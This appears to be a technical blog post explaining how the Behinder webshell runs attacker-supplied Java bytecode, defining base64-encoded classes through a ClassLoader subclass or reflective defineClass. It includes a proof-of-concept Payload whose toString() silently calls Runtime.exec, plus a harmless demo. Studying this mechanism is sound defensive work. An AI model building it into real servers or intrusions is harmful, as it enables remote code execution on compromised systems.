0x01 How it works
First, the server side needs the ability to turn a byte stream into a Class at runtime; everything else builds on that.
Normally, Java exposes no public API for parsing a class byte array directly. ClassLoader does, however, implement a protected defineClass method that converts a byte[] straight into a Class. Its signature (in java.lang.ClassLoader) is:
protected final Class<?> defineClass(byte[] b, int off, int len) throws ClassFormatError

Because the method is protected, it cannot be called from outside the class hierarchy. We could use reflection to bypass the access check, but a more convenient route is to define our own class that extends ClassLoader and call the parent's defineClass from the subclass.
Here is a simple demo:
import java.util.Base64;

public class Demo {
    // Approach 1: subclass ClassLoader so the protected defineClass becomes callable
    public static class Myloader extends ClassLoader {
        public Class<?> get(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    // java.util.Base64 stands in for the JDK-internal sun.misc.BASE64Decoder used
    // originally; that class was removed in JDK 9
    public static Class<?> getClass(String classCode) {
        byte[] bytes = Base64.getDecoder().decode(classCode);
        return new Myloader().get(bytes);
    }

    public static void main(String[] args) throws Exception {
        // base64 of the compiled Payload class shown below
        String classStr = "yv66vgAAADQAQgoADwAjCAAkCAAlCgAmACcKACgAKQgAKgoAKAArCAAsCgAtAC4KAC0ALwcAMAoACwAxCAAyBwAzBwA0AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABpMY29tL2FudHNlYy9kdXBlaS9QYXlsb2FkOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAdjb21tYW5kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADUHADMHADABAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhDAAQABEBAB50b3VjaCAvdG1wL215X3RyYW5zbGV0X3BheWxvYWQBAAdvcy5uYW1lBwA2DAA3ADgHADUMADkAGAEAA21hYwwAOgA7AQA9L1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAvQ29udGVudHMvTWFjT1MvQ2FsY3VsYXRvcgcAPAwAPQA+DAA/AEABABNqYXZhL2lvL0lPRXhjZXB0aW9uDABBABEBAAJPSwEAGGNvbS9hbnRzZWMvZHVwZWkvUGF5bG9hZAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0b0xvd2VyQ2FzZQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEADgAPAAAAAAACAAEAEAARAAEAEgAAAC8AAQABAAAABSq3AAGxAAAAAgATAAAABgABAAAACQAUAAAADAABAAAABQAVABYAAAABABcAGAABABIAAACnAAIAAgAAACkSAkwSA7gABLYABRIGtgAHmQAGEghMuAAJK7YAClenAAhMK7YADBINsAABAAAAHgAhAAsAAwATAAAAIgAIAAAADgADAA8AEwARABYAEwAeABcAIQAUACIAFgAmABgAFAAAACAAAwADABsAGQAaAAEAIgAEABsAHAABAAAAKQAVABYAAAAdAAAAFgAD/AAWBwAe/wAKAAEHAB8AAQcAIAQAAQAhAAAAAgAi";
        Class<?> result = getClass(classStr);
        // Instantiating Payload and calling toString() runs the embedded command
        System.out.println(result.getDeclaredConstructor().newInstance().toString());
    }
}
The value of classStr above is the base64 encoding of the .class file produced by compiling the following class:
package com.antsec.dupei;

import java.io.IOException;

/**
 * @author [email protected]
 * @date 2021/8/11 11:19
 */
public class Payload {
    // The command runs as a side effect of toString(), so merely printing the
    // instance (as Demo.main does) triggers it
    @Override
    public String toString() {
        try {
            String command = "touch /tmp/my_translet_payload";
            if (System.getProperty("os.name").toLowerCase().startsWith("mac")) {
                // On macOS, launch Calculator instead
                command = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";
            }
            Runtime.getRuntime().exec(command);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "OK";
    }
}
At this point we can parse and execute a compiled class byte stream directly at runtime.
Besides calling defineClass through a subclass of ClassLoader as above, reflection can be used as well; newer versions of Behinder (冰蠍) have already switched to this approach.
// Approach 2: reflection (needs imports java.lang.reflect.InvocationTargetException,
// java.lang.reflect.Method and java.util.Base64)
public static Class<?> getClass2(String classCode) throws IllegalAccessException, InvocationTargetException {
    ClassLoader loader = Thread.currentThread().getContextClassLoader();
    byte[] bytes = Base64.getDecoder().decode(classCode);
    // Walk up from the loader's concrete class until the class declaring
    // defineClass(byte[], int, int) is found (it is declared in java.lang.ClassLoader)
    Method method = null;
    Class<?> clz = loader.getClass();
    while (method == null && clz != Object.class) {
        try {
            method = clz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
        } catch (NoSuchMethodException ex) {
            clz = clz.getSuperclass();
        }
    }
    if (method != null) {
        // Drops the protected access check. On JDK 16+ this throws
        // InaccessibleObjectException unless the JVM runs with
        // --add-opens java.base/java.lang=ALL-UNNAMED
        method.setAccessible(true);
        return (Class<?>) method.invoke(loader, bytes, 0, bytes.length);
    }
    return null;
}
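To tie the two halves together, here is an added, self-contained example that is not from the original post and not Behinder's own code. Instead of shipping a base64 blob, it compiles a constructed, harmless stand-in payload (HelloPayload, an assumed name that only reports which loader owns it) in memory with javax.tools, base64-encodes the bytes the way a client would, and then loads them on the "server" side both ways. It also makes two caveats the text leaves implicit visible: a fresh ClassLoader subclass is its own namespace, so the same class can be defined any number of times, whereas the reflective route defines into a loader that already exists, so defining the same class name a second time is rejected with a LinkageError; and on JDK 16 and later setAccessible on ClassLoader.defineClass is refused unless the JVM is started with --add-opens java.base/java.lang=ALL-UNNAMED.

```java
import java.io.ByteArrayOutputStream;
import java.io.OutputStream;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.URI;
import java.util.Base64;
import java.util.Collections;
import javax.tools.FileObject;
import javax.tools.ForwardingJavaFileManager;
import javax.tools.JavaCompiler;
import javax.tools.JavaFileManager;
import javax.tools.JavaFileObject;
import javax.tools.SimpleJavaFileObject;
import javax.tools.StandardJavaFileManager;
import javax.tools.ToolProvider;

public class DefineClassDemo {

    // Constructed stand-in for the Payload class (assumed name HelloPayload): it runs
    // no command, it only reports which ClassLoader ended up owning it.
    static final String SOURCE =
        "public class HelloPayload {\n"
      + "  @Override public String toString() {\n"
      + "    return \"HelloPayload loaded by \" + getClass().getClassLoader();\n"
      + "  }\n"
      + "}\n";

    /** "Client" half: compile one class in memory (needs a JDK) and base64 its bytes. */
    static String compileToBase64(String className, String source) throws Exception {
        JavaCompiler javac = ToolProvider.getSystemJavaCompiler();
        if (javac == null) throw new IllegalStateException("no compiler: run on a JDK, not a JRE");
        ByteArrayOutputStream classBytes = new ByteArrayOutputStream();
        JavaFileObject src = new SimpleJavaFileObject(
                URI.create("string:///" + className + ".java"), JavaFileObject.Kind.SOURCE) {
            @Override public CharSequence getCharContent(boolean ignoreEncodingErrors) { return source; }
        };
        StandardJavaFileManager std = javac.getStandardFileManager(null, null, null);
        // Redirect CLASS_OUTPUT into the byte array instead of a .class file on disk
        // (the source holds a single class, so one output stream is enough).
        JavaFileManager mem = new ForwardingJavaFileManager<StandardJavaFileManager>(std) {
            @Override public JavaFileObject getJavaFileForOutput(JavaFileManager.Location loc,
                    String name, JavaFileObject.Kind kind, FileObject sibling) {
                return new SimpleJavaFileObject(URI.create("mem:///" + name + ".class"), kind) {
                    @Override public OutputStream openOutputStream() { return classBytes; }
                };
            }
        };
        boolean ok = javac.getTask(null, mem, null, null, null, Collections.singletonList(src)).call();
        std.close();
        if (!ok) throw new IllegalStateException("compilation failed");
        return Base64.getEncoder().encodeToString(classBytes.toByteArray());
    }

    /** Server half, approach 1: a ClassLoader subclass exposing the protected defineClass. */
    static class ByteLoader extends ClassLoader {
        ByteLoader(ClassLoader parent) { super(parent); }
        // name null: the JVM reads the class name from the bytes themselves
        Class<?> define(byte[] b) { return defineClass(null, b, 0, b.length); }
    }

    /** Server half, approach 2: reflective defineClass on a loader that already exists. */
    static Class<?> defineReflectively(ClassLoader loader, byte[] b) throws Exception {
        Method m = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
        // JDK 16+ rejects this with InaccessibleObjectException unless the JVM runs with
        // --add-opens java.base/java.lang=ALL-UNNAMED
        m.setAccessible(true);
        try {
            return (Class<?>) m.invoke(loader, b, 0, b.length);
        } catch (InvocationTargetException e) {
            // Method.invoke wraps whatever defineClass threw; surface the real LinkageError/Exception
            if (e.getCause() instanceof Error) throw (Error) e.getCause();
            throw (Exception) e.getCause();
        }
    }

    public static void main(String[] args) throws Exception {
        String b64 = compileToBase64("HelloPayload", SOURCE); // what would travel in the request
        byte[] bytes = Base64.getDecoder().decode(b64);        // what the server decodes

        // Approach 1: every new loader is its own namespace, so the same class can be
        // defined again and again; the two Class objects are distinct.
        ClassLoader app = DefineClassDemo.class.getClassLoader();
        Object first = new ByteLoader(app).define(bytes).getDeclaredConstructor().newInstance();
        Object second = new ByteLoader(app).define(bytes).getDeclaredConstructor().newInstance();
        System.out.println(first);
        System.out.println(second);
        System.out.println("same Class object? " + (first.getClass() == second.getClass()));

        // Approach 2: the class lands in an existing loader (here the context loader), so a
        // second definition under the same name is a duplicate and the JVM rejects it.
        ClassLoader ctx = Thread.currentThread().getContextClassLoader();
        try {
            Object viaReflection = defineReflectively(ctx, bytes).getDeclaredConstructor().newInstance();
            System.out.println(viaReflection);
            defineReflectively(ctx, bytes);
        } catch (LinkageError e) {
            System.out.println("second reflective definition rejected: " + e);
        } catch (RuntimeException e) {
            System.out.println("reflective defineClass blocked by the module system: " + e);
        }
    }
}
```

Run it with `java DefineClassDemo` on JDK 8 to 15 to see both paths succeed and the duplicate rejected; on JDK 16 or later add `--add-opens java.base/java.lang=ALL-UNNAMED`, or watch the reflective path fail before it ever reaches defineClass. The difference in the printed loader names (ByteLoader versus the application loader) is the practical reason a shell like Behinder might prefer one route over the other: the subclass route leaves a throwaway loader per request, the reflective route pollutes the application's own namespace and cannot redefine a name it has already used.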
0x02 References
● Behinder (冰蠍): https://github.com/rebeyond/Behinder